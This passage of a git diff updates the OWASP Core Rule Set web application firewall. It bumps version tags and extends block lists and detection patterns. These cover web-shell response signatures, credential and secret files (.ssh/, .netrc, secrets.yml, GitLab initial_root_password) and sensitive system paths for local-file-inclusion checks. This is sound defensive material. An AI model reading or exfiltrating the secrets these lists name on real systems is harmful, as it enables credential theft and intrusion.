TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:953013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:953014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:953013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:953014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # @@ -133,21 +133,21 @@ SecRule RESPONSE_BODY "@rx (?i)Empty string|F(?:ile size is|reeing memory)|Heade tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-PHP',\ tag:'capec/1000/118/116',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl2=+%{tx.error_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:953015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:953016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:953015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:953016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:953017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:953018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:953017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:953018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" # # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf b/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf index ca1f6885be..9403a7bcc0 100644 --- a/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf +++ b/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -20,11 +20,11 @@ SecRule RESPONSE_HEADERS:Content-Encoding "@pm gzip compress deflate br zstd" \ nolog,\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-IIS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:954011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:954012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:954011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:954012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" # # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # @@ -48,7 +48,7 @@ SecRule RESPONSE_BODY "@rx (?i)[a-z]:[\x5c/]inetpub\b" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-IIS',\ tag:'capec/1000/118/116',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" @@ -69,7 +69,7 @@ SecRule RESPONSE_BODY "@rx (?:Microsoft OLE DB Provider for SQL Server(?: tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-IIS',\ tag:'capec/1000/118/116',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" @@ -93,7 +93,7 @@ SecRule RESPONSE_BODY "@pmFromFile iis-errors.data" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-IIS',\ tag:'capec/1000/118/116',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" @@ -115,7 +115,7 @@ SecRule RESPONSE_STATUS "!@rx ^404$" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-IIS',\ tag:'capec/1000/118/116',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'ERROR',\ chain" SecRule RESPONSE_BODY "@rx \bServer Error in.{0,50}?\bApplication\b" \ @@ -125,8 +125,8 @@ SecRule RESPONSE_STATUS "!@rx ^404$" \ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:954013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:954014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:954013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:954014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # @@ -151,21 +151,21 @@ SecRule RESPONSE_BODY "@rx (?i)[\x5c/]inetpub\b" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/DATA-LEAKAGES-IIS',\ tag:'capec/1000/118/116',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl2=+%{tx.error_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:954015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:954016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:954015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:954016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:954017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:954018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:954017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:954018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" # # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/RESPONSE-955-WEB-SHELLS.conf b/rules/RESPONSE-955-WEB-SHELLS.conf index c6cef68bc7..8b3c692279 100644 --- a/rules/RESPONSE-955-WEB-SHELLS.conf +++ b/rules/RESPONSE-955-WEB-SHELLS.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. (not) All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -20,11 +20,11 @@ SecRule RESPONSE_HEADERS:Content-Encoding "@pm gzip compress deflate br zstd" \ nolog,\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ skipAfter:END-RESPONSE-955-WEB-SHELLS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:955011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-955-WEB-SHELLS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:955012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-955-WEB-SHELLS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:955011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-955-WEB-SHELLS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:955012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-955-WEB-SHELLS" # # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # @@ -46,7 +46,7 @@ SecRule RESPONSE_BODY "@pmFromFile web-shells-php.data" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -66,7 +66,7 @@ SecRule RESPONSE_BODY "@rx r57 Shell Version [0-9.]+|r57 s tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -86,7 +86,7 @@ SecRule RESPONSE_BODY "@rx ^<html><head><meta http-equiv='Content-Type' content= tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -106,7 +106,7 @@ SecRule RESPONSE_BODY "@rx B4TM4N SH3LL[^<]*Mini Shell[^D]*Developed By LameHacker tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -146,7 +146,7 @@ SecRule RESPONSE_BODY "@rx \.:: [^~]*~ Ashiyane V [0-9.]+ ::\." \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -166,7 +166,7 @@ SecRule RESPONSE_BODY "@rx Symlink_Sa [0-9.]+" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -186,7 +186,7 @@ SecRule RESPONSE_BODY "@rx CasuS [0-9.]+ by MafiABoY" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -206,7 +206,7 @@ SecRule RESPONSE_BODY "@rx ^\r\n\r\nGRP WebShell [0-9.]+ " \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -226,7 +226,7 @@ SecRule RESPONSE_BODY "@rx <small>NGHshell [0-9.]+ by Cr4sh</body></html>\n$" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -246,7 +246,7 @@ SecRule RESPONSE_BODY "@rx <title>SimAttacker - (?:Version|Vrsion) : [0-9.]+ - " tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -266,7 +266,7 @@ SecRule RESPONSE_BODY "@rx ^<!DOCTYPE html>\n<html>\n<!-- By Artyum [^<]*<title> tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -286,7 +286,7 @@ SecRule RESPONSE_BODY "@rx <title>lama's'hell v. [0-9.]+" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -306,7 +306,7 @@ SecRule RESPONSE_BODY "@rx ^ *\n[ ]+\n[ ]+lostDC - " \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -326,7 +326,7 @@ SecRule RESPONSE_BODY "@rx ^<title>PHP Web Shell\r\n\r\n\r\n tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -346,7 +346,7 @@ SecRule RESPONSE_BODY "@rx ^\n\n
\n\nRu24PostWebShell " \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -388,7 +388,7 @@ SecRule RESPONSE_BODY "@rx <title>s72 Shell v[0-9.]+ Codinf by Cr@zy_King\r\n\r\n\n\n\n\ng00nshell v[0-9.]+ " \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -450,7 +450,7 @@ SecRule RESPONSE_BODY "@contains <title>punkholicshell" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -470,7 +470,7 @@ SecRule RESPONSE_BODY "@rx ^\n \n azrail [0- tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -490,7 +490,7 @@ SecRule RESPONSE_BODY "@rx >SmEvK_PaThAn Shell v[0-9]+ coded by <a href=" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -510,7 +510,7 @@ SecRule RESPONSE_BODY "@rx ^<html>\n<title>[^~]*~ Shell I\n\n:: b374k m1n1 [0-9.]+ :: tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -550,14 +550,14 @@ SecRule RESPONSE_BODY "@pmFromFile web-shells-asp.data" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/WEB-SHELLS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:955013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-955-WEB-SHELLS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:955014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-RESPONSE-955-WEB-SHELLS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:955013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-955-WEB-SHELLS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:955014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-RESPONSE-955-WEB-SHELLS" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # @@ -579,13 +579,13 @@ SecRule RESPONSE_BODY "@contains

webadmin.php

0) {v1 = NF-1; v2 = NF} else {v1 = NF-2; v2 = NF-1} print tolower($v1"/"$v2) }) }' | grep apache | sort | uniq apache/access.conf @@ -387,6 +440,7 @@ etc/adduser.conf etc/alias etc/alsa etc/alternatives +etc/amavis etc/anacrontab etc/ansible etc/apache/access.conf @@ -402,9 +456,10 @@ etc/apt etc/asciidoc etc/at.allow etc/at.deny +etc/audit etc/avahi -etc/bash_completion.d etc/bash.bashrc +etc/bash_completion.d etc/bashrc etc/bind etc/binfmt.d @@ -412,6 +467,7 @@ etc/bluetooth etc/bonobo-activation etc/bootptab etc/brltty +etc/byobu etc/ca-certificates etc/calendar etc/casper.conf @@ -432,7 +488,9 @@ etc/cron.d etc/cron.hourly etc/cron.monthly etc/cron.weekly +etc/cron.yearly etc/crontab +etc/crowdsec etc/crypttab etc/cups etc/cvs-cron.conf @@ -449,7 +507,9 @@ etc/dictionaries-common etc/dkms etc/dns2tcpd.conf etc/dnsmasq.d +etc/docker etc/dockeretc/dpkg +etc/dovecot etc/e2fsck.conf etc/elasticsearch etc/emacs @@ -479,6 +539,7 @@ etc/gdm3 etc/geoclue etc/ghostscript etc/gimp +etc/gitlab etc/glvnd etc/gnome etc/gnucash @@ -515,6 +576,7 @@ etc/kernel etc/kibana etc/ld.so.conf etc/ldap +etc/letsencrypt etc/libblockdev etc/libibverbs.d etc/libnl-3 @@ -527,6 +589,7 @@ etc/login.defs etc/logrotate.conf etc/logrotate.d etc/logstash +etc/logwatch etc/lsb-release etc/ltrace.conf etc/lvm @@ -563,12 +626,15 @@ etc/networkmanager etc/newsyslog.conf etc/newt etc/nghttpx -etc/nginx/ +etc/nginx etc/nikto etc/npasswd +etc/nsswitch.conf etc/nuxeo.conf etc/odbcdatasources etc/openal +etc/opendkim +etc/opendmarc etc/openldap/ldap.conf etc/openmpi etc/opt @@ -598,6 +664,7 @@ etc/pulse etc/pure-ftpd etc/pureftpd etc/python +etc/qemu etc/rc.conf etc/rc.d/rc.httpd etc/rc0.d @@ -631,6 +698,7 @@ etc/smb.conf etc/smbpasswd etc/smi.conf etc/snmp +etc/sogo etc/sound etc/spamassassin etc/speech-dispatcher @@ -669,6 +737,7 @@ etc/ubuntu-advantage etc/udev etc/udisks2 etc/ufw +etc/unbound etc/update-manager etc/update-motd.d etc/update-notifier @@ -693,12 +762,15 @@ etc/wu-ftpd etc/x11 etc/xdg etc/xml +gitlab.rb +gitlab_config_ gruntfile.js home/postgres http/httpd.conf httpd/conf/httpd.conf includes/configure.php inetpub/wwwroot/global.asa +initial_root_password jakarta/dist/tomcat jakarta/tomcat/conf jakarta/tomcat/logs @@ -745,6 +817,7 @@ php5/apache.conf php5/apache2.conf php5/httpd.conf postgresql/log/ +/proc/ proc/0 proc/1 proc/2 @@ -837,10 +910,12 @@ server/default/conf server/default/deploy server/default/log services.yml +sftp.json sites/default/default.settings.php sites/default/settings.local.php sites/default/settings.php squirrelmail/www +/sys/ sys/block sys/bus sys/class @@ -903,9 +978,7 @@ var/saf/_log var/saf/port/log var/spool var/webmin -var/www/conf -var/www/html/squirrelmail -var/www/log +var/www volumes/macintosh_hd volumes/webbackup wamp/bin/apache @@ -922,6 +995,7 @@ windows/setupact.log windows/setupapi.log windows/setuperr.log windows/system32 +windows/syswow64 windows/updspapi.log windows/windowsupdate.log windows/wmsetup.log diff --git a/rules/php-function-names-933150.data b/rules/php-function-names-933150.data index adc6afc2b0..c4b2573f6a 100644 --- a/rules/php-function-names-933150.data +++ b/rules/php-function-names-933150.data @@ -98,7 +98,6 @@ imagegd2 ini_get ini_get_all ini_set -intval iptcembed is_array is_dir @@ -149,7 +148,6 @@ pg_prepare pg_query php_strip_whitespace php_uname -phpinfo phpversion posix_getegid posix_geteuid @@ -231,7 +229,6 @@ strtoupper uasort ucfirst uksort -unserialize urldecode urlencode var_dump diff --git a/rules/restricted-files.data b/rules/restricted-files.data index 94a406dd0a..af77bfcaec 100644 --- a/rules/restricted-files.data +++ b/rules/restricted-files.data @@ -6,6 +6,7 @@ # home level dotfiles (keep in sync with lfi-os-files.data). # Also include commented values (e.g., `# .env`), but not comments. # grep -E "^(#\s*)?\.\S+$" lfi-os-files.data | sed 's/^#\s*//' +.access/ .addressbook .anydesk/ .aptitude/config @@ -15,20 +16,28 @@ .bash_ .bashrc .boto +.cache/ .cache/notify-osd.log .cargo/ +.config.local.php .config/ +.coverage +.coveralls.yml +.credentials .cshrc .cups/ +.cvs .dbus/ .deployment-secrets.txt .docker/ +.dockerignore .drush/ .env .envrc .eslintignore .fbcindex .forward +.ftpconfig .gem/ .git/ .gitattributes @@ -44,10 +53,12 @@ .gsutil/ .hg/ .hgignore +.history .hplip/hplip.conf .htaccess .htdigest .htpasswd +.ipynb_checkpoints/ .java/ .ksh_history .kube/ @@ -62,7 +73,9 @@ .local/state/ .lynx_cookies .minikube/ +.msmtprc .my.cnf +.myscmserverinfo .mysql_history .nano_history .netrc @@ -73,6 +86,9 @@ .nsr .nvm/ .oh-my- +.pac +.pass +.passwd .password-store .pearrc .pgpass @@ -83,23 +99,32 @@ .procmailrc .profile .psql_history +.pwd +.pytest_cache/ .python_history .rediscli_history +.remote-sync.json .rhistory .rhosts .rustup +.s3cfg +.secrets .selected_editor +.settings/ .sh_history -.sqlite_history .snap/ +.sqlite_history .ssh/ .subversion/ .svn/ .svnignore .tconn/ .tcshrc -.tmux.conf +.terraform.lock.hcl +.terraform/ .thunderbird/ +.tmux.conf +.tools/ .tor/ .travis.yaml .travis.yml @@ -108,16 +133,17 @@ .vim/ .viminfo .vimrc -.vscode .vmware/ +.vscode +.web.config.swp .wget-hsts .www_acl .wwwacl .xauthority .yarnrc -.zshenv .zhistory .zsh_history +.zshenv .zshrc # Generic config filenames and common permutations @@ -277,6 +303,11 @@ config_sample.yml config_test.yml config-test.yml config.test.yml +config.sample.inc.php +credentials.json +secrets.json +secrets.yaml +secrets.yml # Compressed database dumps .sql.001 .sql.7z @@ -310,6 +341,10 @@ config.test.yml .sql.xz .sql.yz1 .sql.z +# GitLab Omnibus +gitlab.rb +gitlab_config_ +initial_root_password # AWS cli aws.yaml aws.yml @@ -318,6 +353,9 @@ aws-key.yml # October CMS credentials file /auth.json # Wordpress +/debug.log +/error.log +/errors.log wp-config. wp-config- wp-config_ @@ -413,6 +451,28 @@ compose.yml compose.yaml # CVE-2023-49103 phpinfo.php +# Python cache +__pycache__/ +# Windows system ini files +boot.ini +system.ini +win.ini +# NodeJS log file +pm2.log +# Generic log filename +debug.log +# Mysql/MariaDB config file +debian.cnf +my.cnf +mysql.cnf +mysqldump.cnf +# FTP config files +ftp-sync.json +# Yarn log files +yarn-debug.log +yarn-error.log +# Code coverage config file +coverage.xml # /proc entries (keep in sync with lfi-os-files.data) # grep -E "^proc/" lfi-os-files.data @@ -496,6 +556,9 @@ proc/version_signature proc/vmallocinfo proc/vmstat proc/zoneinfo +/proc/ + +sftp.json # /sys entries (keep in sync with lfi-os-files.data) # grep -E "^sys/" lfi-os-files.data @@ -510,3 +573,9 @@ 